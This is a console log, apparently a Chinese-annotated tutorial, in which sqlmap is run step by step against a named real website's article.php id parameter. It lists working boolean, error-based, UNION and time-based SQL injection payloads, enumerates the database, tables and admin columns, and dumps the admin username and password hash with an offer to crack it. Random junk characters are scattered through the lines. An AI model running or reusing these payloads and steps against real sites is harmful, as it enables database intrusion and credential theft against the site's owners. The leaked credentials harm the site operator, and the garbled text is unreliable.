D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db8 h, y7 l p: U6 d$ U
ms "Mysql" --current-user /* 注解:获取当前用户名称
% {, j0 J; c5 H sqlmap/0.9 - automatic SQL injection and database takeover tool3 ^* w' w; G7 v5 R {$ e
http://sqlmap.sourceforge.net starting at: 16:53:54
" T$ N- b9 I( M[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
: ]7 Y, ~* P- {( h4 r session file
3 Q* O- C p5 |3 K3 h[16:53:54] [INFO] resuming injection data from session file" F+ q* h* ~7 W5 r
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
2 T5 S$ @2 I! `+ Q6 c* R[16:53:54] [INFO] testing connection to the target url
0 u1 B1 _1 g% q2 S6 ^9 G/ |3 G3 jsqlmap identified the following injection points with a total of 0 HTTP(s) reque5 q9 D1 f" O8 F/ X7 N) |
sts:0 V1 g9 W! h1 h" B" Q$ J: z
---
! p4 h7 P$ v) X( ?9 @Place: GET( S8 F6 B& J. P" C" P
Parameter: id
+ V; q; D, Z% W' s Type: boolean-based blind9 L# R" W2 e6 {) o5 _( {; {* e9 x+ B
Title: AND boolean-based blind - WHERE or HAVING clause
0 y" o _2 | ]+ ] Payload: id=276 AND 799=799
3 R$ ]8 @8 K$ P, y0 r' k+ u) l Type: error-based
9 J' s/ O) [" h2 e% w2 D+ t Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
# n4 ]# ]0 N. \. f Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
9 i( @" ~8 b% L120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58( V8 F% [# N Z- @8 u, B
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a); U l9 n" A# S& u% z+ Y+ R
Type: UNION query
6 R; c6 E3 b3 \' `% I% O Title: MySQL UNION query (NULL) - 1 to 10 columns4 z- e* b h/ l; X. Z6 o* k3 V/ |- b
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
, z% \. V: F* h$ r' U(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
# C4 s9 E2 p( @CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#5 x, C A8 s( `$ F4 X; L
Type: AND/OR time-based blind4 m# L$ U" l5 X% Q, e
Title: MySQL > 5.0.11 AND time-based blind
4 C: r3 C" K& }1 \) E" p Payload: id=276 AND SLEEP(5)
/ v4 k8 p5 |* o& f$ t f---
7 @. x+ B9 a, y2 j0 M/ a[16:53:55] [INFO] the back-end DBMS is MySQL
4 H, N6 M7 a# p8 |: `; q* ^web server operating system: Windows+ L; p/ \6 z0 u6 \+ `
web application technology: Apache 2.2.11, PHP 5.3.05 T9 I- a$ V3 N- u+ _/ H
back-end DBMS: MySQL 5.0. w6 m/ p7 y; T4 c
[16:53:55] [INFO] fetching current user
8 U5 E1 P( n) d! pcurrent user: 'root@localhost'
3 o4 C8 t" U- [7 h[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou& G2 a" Y/ \) [ e
tput\www.wepost.com.hk' shutting down at: 16:53:58' R) T% }% \2 Z/ v5 M1 n4 G+ z" Z
" R+ Q! O* J* i: d# r+ k
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
2 k# E0 `7 P4 q, E& Q2 S- Lms "Mysql" --current-db /*当前数据库' C q+ k& P( |( N
sqlmap/0.9 - automatic SQL injection and database takeover tool
/ b7 }: U0 J3 V( L http://sqlmap.sourceforge.net starting at: 16:54:16
% ^" e; V" g) H/ r[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
; l2 E5 g& |) a3 n5 B6 M$ _4 j7 T session file
?/ {9 b, j* |/ _! v[16:54:16] [INFO] resuming injection data from session file
2 X$ { z1 z" k, z5 M[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
, Y+ G1 d3 h4 J2 Q+ O! A9 }7 n0 A[16:54:16] [INFO] testing connection to the target url
8 @* m6 Z0 o1 J2 }; e) F" Csqlmap identified the following injection points with a total of 0 HTTP(s) reque
0 J4 p, Z% x( Z9 ysts:
! t4 O, O; X' T8 S* V$ X4 X8 g) B---, ^9 {- |& f% K3 y( B2 H
Place: GET% o9 d$ {- o- S
Parameter: id
9 N/ G: {; }/ Z1 V0 J/ O( M Type: boolean-based blind
W1 i8 W8 P" a2 x+ C- Y Title: AND boolean-based blind - WHERE or HAVING clause
; o ?$ S* O Q/ J/ r Payload: id=276 AND 799=799
+ o( G8 ^2 @6 r Type: error-based
' {* O U8 w1 s4 H. @- S Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause: I, I ?/ w' b7 W5 y: S
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
% u# I. R/ m( ~2 C s5 J120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
1 n9 N- x) H; [1 P3 K( p6 w- |),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) U4 S& O* L. ] N6 ^1 v T
Type: UNION query
2 V+ ~7 o; U3 h+ Y( n+ } Title: MySQL UNION query (NULL) - 1 to 10 columns
3 A* w& u+ k0 X, I Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
& q j# o2 V) v; f) G+ a. `1 R' ?(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),8 A) _) W) n+ Q1 H/ {: }; ?
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#" ]$ I& Y) O" ?& ?
Type: AND/OR time-based blind0 v/ F. n% v g- ^7 l. }$ }3 m, e
Title: MySQL > 5.0.11 AND time-based blind
* A" m$ k3 Y- s, y7 T& h Payload: id=276 AND SLEEP(5)( K; \' M& s' e5 N6 F
---) D4 R/ w3 X2 D: b9 b
[16:54:17] [INFO] the back-end DBMS is MySQL8 Z' f* G" g+ f+ {
web server operating system: Windows+ {9 ` U) }' n* e- u
web application technology: Apache 2.2.11, PHP 5.3.07 Z8 i2 m A& j. e3 h
back-end DBMS: MySQL 5.0! X/ U; q; L7 \$ Q
[16:54:17] [INFO] fetching current database! E8 x. f( t; v% @4 ~$ W
current database: 'wepost'
1 [( t% D( F2 R$ H7 p9 K3 V[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
3 c! h- ?- Y7 u& `+ ^1 Otput\www.wepost.com.hk' shutting down at: 16:54:18
6 g! \3 s! r2 t/ h, @D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
8 z* }5 N: m* d( e( kms "Mysql" --tables -D "wepost" /*获取当前数据库的表名
8 B9 T- ?9 Q: K: n3 W9 @- { sqlmap/0.9 - automatic SQL injection and database takeover tool
7 f ^& d/ Q9 V* T4 W& C1 x6 J http://sqlmap.sourceforge.net starting at: 16:55:251 t: r/ v1 j. }3 M$ n/ H
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as, } G, l- W* W' `5 Q6 _' z- d
session file" w9 h! P9 w+ s# |3 v( i
[16:55:25] [INFO] resuming injection data from session file
# P/ k6 ]2 z! P7 Z* }8 W/ q0 w, y: w[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
& N; \" z( t5 |/ L) Y& O[16:55:25] [INFO] testing connection to the target url8 ]: v8 }9 i$ ?( S/ l n7 o4 {- H
sqlmap identified the following injection points with a total of 0 HTTP(s) reque1 Y6 h- y( g) Z
sts:
5 B; \8 k3 N& U$ H/ {$ f---! U( K" A# U6 r+ s
Place: GET
+ u1 |* F3 r0 q. z7 |' E- xParameter: id5 y8 z* k& Y- O3 d2 W7 `
Type: boolean-based blind3 {2 H! Z& w" h6 i S- t
Title: AND boolean-based blind - WHERE or HAVING clause6 c4 w. @; I' d+ D/ Y: y9 |
Payload: id=276 AND 799=799
7 u5 f+ p; \5 I ^0 Q Z4 S Type: error-based
- ?+ G+ L$ q% ^+ B% G" s( M Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
8 B6 J1 J% g4 L& e Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
- h/ ~" D: r, x" Z- e( M120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
% i; `2 d$ p+ w1 T" A3 b. B),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
! z6 Z* l! Z& V' Q) h Type: UNION query
% ~% t* B3 R! z. g$ l Title: MySQL UNION query (NULL) - 1 to 10 columns
9 k7 c% v. j" K% { Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR' Z! {3 p) O+ Q2 V
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),% I5 ^/ A0 d+ o; `0 @! d
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
4 a& }1 W$ b3 C/ s: j Type: AND/OR time-based blind1 f5 ^, x: r# O. Q. a4 f2 O+ T
Title: MySQL > 5.0.11 AND time-based blind
$ c9 x% m1 j8 m) X. n7 {3 L Payload: id=276 AND SLEEP(5)/ e! P, q* B2 @/ \; ]
---
) M& D# {6 W& T+ [' ?/ @. v[16:55:26] [INFO] the back-end DBMS is MySQL F* s! u1 K* }5 J7 g5 c" s5 I8 D
web server operating system: Windows
1 Q" J- H+ o) a. Yweb application technology: Apache 2.2.11, PHP 5.3.0
' H, t0 [( A) u# i2 v1 Sback-end DBMS: MySQL 5.0
$ h' ]1 r+ g- n# G/ |2 ~[16:55:26] [INFO] fetching tables for database 'wepost'
" ?1 T7 O# `! }[16:55:27] [INFO] the SQL query used returns 6 entries
- d' W( D: J8 j/ Y4 ?: o: o4 zDatabase: wepost2 C* V9 \7 q9 a2 V W7 X$ f+ b
[6 tables]2 S. K* u' B8 A* ?
+-------------+; C/ O8 h& X" k. e4 A5 h0 a l- @
| admin |
" L& f9 n A: S: j4 l| article |1 z& G: T* k( @$ O4 C4 B
| contributor |, n0 n6 q3 R0 B
| idea |
+ `8 |3 k/ p' T6 ?; E7 P4 O| image |
$ B9 D2 ?0 T2 b| issue |
: y0 k) v7 U+ P) M1 P, [; j. \+-------------+
; H3 E1 w* c4 s8 j. W4 a[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
' ~; B$ x6 \5 J Dtput\www.wepost.com.hk' shutting down at: 16:55:33
- T; S$ T0 A$ T. M7 ~8 D. K; ?" F. t7 e+ G* z% q
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
0 i0 r" H8 R4 g# V( lms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名
1 B+ o$ }+ k) x( ~* D3 U, @ sqlmap/0.9 - automatic SQL injection and database takeover tool
) f) E H1 S* n: Q6 c$ A http://sqlmap.sourceforge.net starting at: 16:56:06
& R, v: j6 a8 Q3 I! wsqlmap identified the following injection points with a total of 0 HTTP(s) reque$ [0 F2 L( R4 w% {
sts:
3 \( R) e+ @5 c; V* r5 q1 x---1 a* q1 i" {7 p/ E% j
Place: GET
N! W* `/ A$ t' \ I8 `9 ]; Q: @9 [Parameter: id3 C% O, L- L7 y0 J$ s1 U) J8 R; D( e
Type: boolean-based blind, e$ h4 n7 F6 Z, o
Title: AND boolean-based blind - WHERE or HAVING clause H5 `, ^+ x$ ^3 \! \. H6 i
Payload: id=276 AND 799=799
) Q; d/ @; M1 G$ m6 R Type: error-based ?' r0 O: d7 a5 s. |5 H
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause& Q$ k3 Y5 L9 [. G+ w$ {6 Q
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118," w/ w4 M G/ f" V9 q7 s
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58( m; B; F" J% B6 w+ B: a
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)* B$ m1 {; e K+ S
Type: UNION query) b5 [" ?1 c! a( Q/ r; i- U; R9 ~
Title: MySQL UNION query (NULL) - 1 to 10 columns
, b3 y0 ^: ]) W" N9 {+ S Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR* `: Q$ q" H: v0 S! z( i
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),* j8 |/ r! @ |- v. M
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#, d& i" G3 w) {$ F% e
Type: AND/OR time-based blind
0 i9 X) Z" y1 a3 m% n Title: MySQL > 5.0.11 AND time-based blind2 l# [6 L* y6 ~ M6 B) f) @
Payload: id=276 AND SLEEP(5)9 n- S+ c7 K! p; M4 j2 O& [
---( K. S5 j1 ~0 K2 h( ~2 _. V
web server operating system: Windows( @! Y# _2 f' e D, K( P$ h
web application technology: Apache 2.2.11, PHP 5.3.0
, f; R6 s3 G6 \1 j! ~+ }# t/ T pback-end DBMS: MySQL 5.0
8 |& s% L- J& o+ s[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
2 v8 M$ ^5 z, z1 Mssion': wepost, wepost
1 z9 p. u. G! ^5 cDatabase: wepost6 W# V, J. G. N! `
Table: admin U; Y% O$ p) m% ~6 ~& [1 E# b
[4 columns]
! r# _/ ~$ u: n3 _3 q2 f! \+----------+-------------+
4 S; }! i" \- s| Column | Type |
# X: L' ~! W8 t+----------+-------------+1 L+ w0 k' p x2 M Q8 A' H
| id | int(11) |* N8 i) L/ K. H' ^# z/ j% ~6 `' `
| password | varchar(32) |5 ?, `. t! o2 O6 N6 R% e$ j
| type | varchar(10) |
/ _' V2 r# Q [0 F+ }5 k/ A, U0 _| userid | varchar(20) |
/ _ z. } t5 {5 a4 g$ J+----------+-------------+
5 g# R, r$ W4 i3 ^ shutting down at: 16:56:19
3 T+ T$ \, k# l5 U( P4 i3 d3 j+ d3 Q7 H! t1 r
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db1 i6 B" O0 P: d8 b* C# b- x
ms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容3 Q9 V; k6 }0 H" e
sqlmap/0.9 - automatic SQL injection and database takeover tool0 U/ w5 E. c( t% @9 y% d
http://sqlmap.sourceforge.net starting at: 16:57:143 }) g6 x8 d0 C
sqlmap identified the following injection points with a total of 0 HTTP(s) reque8 x) ~4 }$ D2 B% V: P
sts:
/ D* [/ O6 [4 |7 s) |9 w---+ X2 r9 }4 ], |5 m7 F, L
Place: GET# c" k" n" c& `# t% A
Parameter: id
, V( d( H9 ~9 \& ` Type: boolean-based blind
" d+ p9 n5 ?; k Title: AND boolean-based blind - WHERE or HAVING clause
: ~5 Y, ?8 i [) D- i Payload: id=276 AND 799=799
2 ~- W) `9 a& j; d Type: error-based
6 a9 J( s' a2 d% S Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause0 o' [5 w5 O& W3 J# i# A+ T4 I$ e
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,3 O4 {$ F) A- `6 L) g$ ^
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
/ W" @9 S' I" a+ Q1 ?8 u4 q),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)$ l* x$ A6 ^3 x0 y1 F
Type: UNION query3 {. x. R0 x! y( I
Title: MySQL UNION query (NULL) - 1 to 10 columns/ m& ~1 W" }. N: Z* ?
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
+ E; J# x! F4 Y$ |' Y- T; f8 f(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
: `8 h" `# A# l2 a; G! TCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
- T+ A2 a' E! m& I Type: AND/OR time-based blind' H' {4 \- [( Y7 m* S7 T% \
Title: MySQL > 5.0.11 AND time-based blind
0 K0 y4 L. @. w4 t! Z/ E8 T Payload: id=276 AND SLEEP(5)
8 i a, }" ]. N; |! o9 I---
3 r% E1 F2 C- m3 ?6 e ]! F8 sweb server operating system: Windows
, p! H- v/ N; E ]; e5 v# vweb application technology: Apache 2.2.11, PHP 5.3.0
3 b0 h7 ^, r& N; R, O8 Uback-end DBMS: MySQL 5.0
# D! |0 ^- _' C4 F1 y7 L0 ]" d; `recognized possible password hash values. do you want to use dictionary attack o' o7 w _- n+ e6 y! t4 t
n retrieved table items? [Y/n/q] y0 G4 q1 d5 Q' @
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]* D0 P0 j5 g0 A t) P! ~8 E, W; j& h
do you want to use common password suffixes? (slow!) [y/N] y9 P' l* _7 |1 D* T0 k6 J+ W
Database: wepost
, h; e b$ U( l4 C$ n- XTable: admin( R8 F. ~# {4 z* c' G
[1 entry]9 y. k3 a+ S- w& P/ h
+----------------------------------+------------+
4 f! M# ?3 @ q6 O9 P: U, C4 P| password | userid |# {! S' ~% h% D! ]
+----------------------------------+------------+
# i4 |# C _) K7 Y9 g: C| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |* s2 R; s% t7 J7 |9 d& g
+----------------------------------+------------+* D2 ^- }* R- B7 v% W( N0 G" ?
shutting down at: 16:58:14
. M3 [: g/ @; {7 x% x7 }7 K1 z8 i2 Y) ]+ e
D:\Python27\sqlmap> |